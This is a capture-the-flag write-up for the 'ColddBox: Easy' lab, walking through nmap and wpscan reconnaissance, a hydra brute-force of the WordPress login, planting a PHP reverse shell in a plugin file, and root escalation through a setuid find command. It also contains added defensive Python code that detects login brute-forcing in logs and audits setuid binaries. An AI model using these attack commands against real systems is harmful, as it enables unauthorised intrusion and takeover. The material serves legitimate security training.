# ColddBox: Easy

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxI9paakOr8vV4JYB6%2Fimage.png?alt=media\&token=b88da66b-ba2f-4ade-b0ca-9c9a7562a5cf)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**), which skips the ping-based host discovery and scans the target directly.

```
nmap -Pn 10.10.70.76
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxIlFuFLbvTrzlk7tR%2Fimage.png?alt=media\&token=fb124fec-0172-4151-a44d-94fc357ce56c)

Detailed nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p 80**: scan only port 80
* **-oN nmap**: save the output into a file called `nmap`

```
nmap -sV -sC -p 80 -oN nmap 10.10.70.76
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxIpH0PQPf8Rppguj5%2Fimage.png?alt=media\&token=a5063fa5-675e-4269-81f0-f562f68473b6)

## Enumeration

Let's visit the site.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxJCImZIZzDvcRSGH1%2Fimage.png?alt=media\&token=d6721d4e-656e-4c22-97ba-bd369e9abdc1)

It looks like a well-made page. While looking through the website, I found a login page.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxKY8E2dksr6yc8SIz%2Fimage.png?alt=media\&token=03789a84-d586-44d1-b05c-056839832646)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxKSjlhemZn0OqDrdH%2Fimage.png?alt=media\&token=5094de51-f6ba-4a2b-90e4-a3b933061688)

The nmap scan also told us that `WordPress 4.1.31` is running. There is a WordPress scanner called `wpscan`; let's use it to find more information (`-e vp,t,u` enumerates vulnerable plugins, themes and users).

```
wpscan --url http://10.10.70.76/ -e vp,t,u
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxLB2sQEeNOVGAuQxn%2Fimage.png?alt=media\&token=64e3688e-9cda-4f04-ae3f-5921079626b7)

Looking at the output, we find some interesting information.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxPztXbsah5dhwSy6p%2Fimage.png?alt=media\&token=286ab3af-d44e-4c10-81ed-1598fefbe795)

Let's use `hydra` to brute-force the login and find at least one password for one of the users. I saved the usernames in a file called `users`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxQW7cRWCHCZIMZGEX%2Fimage.png?alt=media\&token=4a30b66f-8fe5-4778-99c8-4980407305a0)

## Exploitation

Let's now use hydra to brute-force the login form.

```
hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxRd1AKOj06GW3JF1M%2Fimage.png?alt=media\&token=976edd04-71e3-4266-9d4b-a792f9030203)

And we get the password. Let's log in.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxRvR-YnwREgB653aY%2Fimage.png?alt=media\&token=eff45257-4096-4244-b532-3ca5ebaa6565)
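From the server's side, the hydra run above is noisy: one source sends a burst of `POST /wp-login.php` requests that are all answered with a 200 (the form re-rendered) until the right guess gets a 302 redirect, which is the `S=Location` success condition hydra was told to look for. The following detector is an added example, not part of the original writeup; it flags such bursts in combined-format access logs, and the log format and sample lines are assumed and constructed.

```python
"""Flag wp-login.php brute-force bursts in combined-format access logs.
Added example, not from the original writeup: the hydra run above leaves a burst of POST
/wp-login.php requests from one source, each answered 200 (form re-rendered) until the
correct guess gets a 302 redirect, the `S=Location` success condition used above."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Assumed Apache/nginx combined log format; only the fields used here are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    """Return ip/ts/method/path/status for one line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: (max_failures_in_window, logged_in)} for sources with >= `threshold`
    non-302 wp-login.php POSTs in any `window`; logged_in means a 302 followed."""
    failures, succeeded = defaultdict(list), set()
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or not rec["path"].startswith("/wp-login.php"):
            continue
        if rec["status"] == 302:
            succeeded.add(rec["ip"])  # successful login: treat the account as compromised
        else:
            failures[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, stamps in failures.items():
        stamps.sort()
        best = start = 0
        for end in range(len(stamps)):  # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = (best, ip in succeeded)
    return hits

# Constructed sample log (not real output from the box): one burst, one normal visitor.
SAMPLE_LOG = [f'10.10.14.5 - - [10/Jun/2021:12:00:0{i} +0000] "POST /wp-login.php HTTP/1.1" 200 4231'
              for i in range(6)] + ['192.168.1.20 - - [10/Jun/2021:12:00:30 +0000] "POST /wp-login.php HTTP/1.1" 200 4231',
              '10.10.14.5 - - [10/Jun/2021:12:00:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0']
```

Running `find_bruteforce(SAMPLE_LOG)` reports the burst source with six failures in one window and a successful login afterwards, while the single legitimate attempt is not flagged.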

We are logged in. To get a reverse shell on the machine we have to add a PHP reverse shell, which you can find [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). First go to the `Plugins` tab and replace the contents of one of the plugin files with the PHP reverse shell, making sure to change the IP to your own.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxXjVYx1G17laRR35S%2Fimage.png?alt=media\&token=f29ead18-4317-48cb-b62d-20bbc9a6acfd)

After changing it, click Update File and start a netcat listener.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxTTgVtRMsD0yo-xei%2Fimage.png?alt=media\&token=5a7f9a9c-619b-48c5-84e6-da77bb81d5e8)

Then navigate to the modified plugin file:

```
http://10.10.58.100/wp-content/plugins/akismet/akismet.php
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-Mbx_XNnj8jmj3FkePkd%2Fimage.png?alt=media\&token=7271f8dc-3c34-42b0-ace1-39362d6f08ef)

You should get a reverse shell. Let's stabilize the shell.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-Mbxa3mf-Im15CUXylyo%2Fimage.png?alt=media\&token=34403df4-d6d7-42ea-bddd-977bb6510c26)

## Privilege Escalation

Let's look for `SUID` binaries that we can exploit.

```
find / -perm -u=s -type f 2>/dev/null
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbxai2m08hk7m6DRX8t%2F-Mbxbaynynf8_na7-lFw%2Fimage.png?alt=media\&token=e5ff3827-f5cc-4ea7-93da-aa1819b5c9a3)

We have `/usr/bin/find`; let's go to `GTFOBins` and find the command to escalate privileges.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbxai2m08hk7m6DRX8t%2F-Mbxbs8Eh1J1N_kVOpQV%2Fimage.png?alt=media\&token=29816fd0-5a8c-41bb-bed3-c6bef39ebd0c)

Let's use the second command:

```
find . -exec /bin/sh -p \; -quit
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbxai2m08hk7m6DRX8t%2F-Mbxc4GCKoHCbO2Z_86O%2Fimage.png?alt=media\&token=b984358f-e8f8-4231-90a8-76da134e7459)

We are now root.
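Defender's view of this step, as an added example that is not from the original writeup: a setuid-root `/usr/bin/find` is the misconfiguration the whole escalation rests on, and keeping a per-image baseline of expected setuid files makes such a stray bit stand out during a routine audit. The baseline set and the sample records below are assumptions and constructed data, not output from the box.

```python
"""Audit setuid binaries against an expected baseline.
Added example, not from the original writeup: the `find / -perm -u=s` step above lists
every setuid file, and a setuid-root /usr/bin/find is the misconfiguration the escalation
rests on. Alerting on setuid files outside a per-image baseline catches it before abuse."""
import os
import stat

# Assumed baseline for a minimal Debian/Ubuntu install; build yours from a clean image.
EXPECTED_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
                 "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount",
                 "/bin/umount", "/bin/ping", "/usr/lib/openssh/ssh-keysign"}
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")  # skipped: setuid bits there are noise

def collect_suid(root="/"):
    """Yield (path, st_mode) for every regular file under `root` with the setuid bit set."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; nothing to audit
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode

def audit_suid(records, expected=EXPECTED_SUID):
    """Return (unexpected, world_writable) from (path, mode) records: setuid paths not in
    `expected`, and setuid paths anyone can overwrite. Non-setuid records are ignored,
    so `audit_suid(collect_suid())` audits the live host."""
    unexpected, writable = [], []
    for path, mode in records:
        if not mode & stat.S_ISUID:
            continue
        if path not in expected:
            unexpected.append(path)
        if mode & stat.S_IWOTH:
            writable.append(path)
    return sorted(unexpected), sorted(writable)

# Constructed sample records (not real output from the box); modes are st_mode values.
SAMPLE = [("/usr/bin/sudo", 0o104755), ("/usr/bin/passwd", 0o104755),
          ("/usr/bin/find", 0o104755),       # setuid find, as on ColddBox
          ("/opt/backup/helper", 0o104757),  # setuid and world-writable: worst case
          ("/usr/bin/vim", 0o100755)]        # no setuid bit: ignored
```

On the sample records `audit_suid(SAMPLE)` reports `/usr/bin/find` and `/opt/backup/helper` as unexpected and the latter also as world-writable; on a live host run `audit_suid(collect_suid("/"))` as root so every directory is readable.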
